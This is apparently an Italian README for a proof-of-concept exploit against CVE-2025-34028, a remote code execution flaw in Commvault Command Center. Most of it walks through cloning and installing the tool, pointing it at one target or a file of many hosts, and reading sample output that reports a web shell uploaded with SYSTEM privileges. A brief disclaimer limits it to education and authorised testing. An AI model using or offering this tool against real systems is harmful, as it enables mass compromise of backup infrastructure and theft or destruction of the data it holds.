
Proof-of-Concept (PoC) per CVE-2025-34028, una vulnerabilità di Remote Code Execution in Commvault Command Center. Questo script Python scansiona uno o più target, esegue comandi e segnala gli host vulnerabili.
Uno script Python per CVE-2025-34028, una vulnerabilità di esecuzione di codice in remoto in Commvault Command Center. Questo strumento consente di testare singoli target o di scansionare più host in blocco.
git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt
Installa i requisiti con:
pip install requests tabulate
usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)
CVE-2025-34028 Commvault RCE Exploit
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Single target URL (e.g., https://192.168.1.100:8000)
-f TARGETS_FILE, --file TARGETS_FILE
File containing multiple targets, one per line
Testa un singolo target:
python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000
Scansiona più target da un file:
python CVE-2025-34028-Commvault.py -f targets.txt
Il file dei target deve contenere un target per riga nel formato:
https://host:porta
http://ip
Esempio di targets.txt:
https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443
Lo script fornisce:
Esempio di output:
CVE-2025-34028 Commvault RCE PoC
[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM
[+] Results Summary
+---------+------------------------------+---------------------+------------------+
| Index | URL | Status | System User |
+---------+------------------------------+---------------------+------------------+
| 1 | https://cvtest.example.com:8000 | RCE Successful | NT AUTHORITY\SYSTEM |
+---------+------------------------------+---------------------+------------------+
Questo strumento è destinato esclusivamente a scopi educativi e a test autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo programma.
Licenza MIT - Vedere il file LICENSE per i dettagli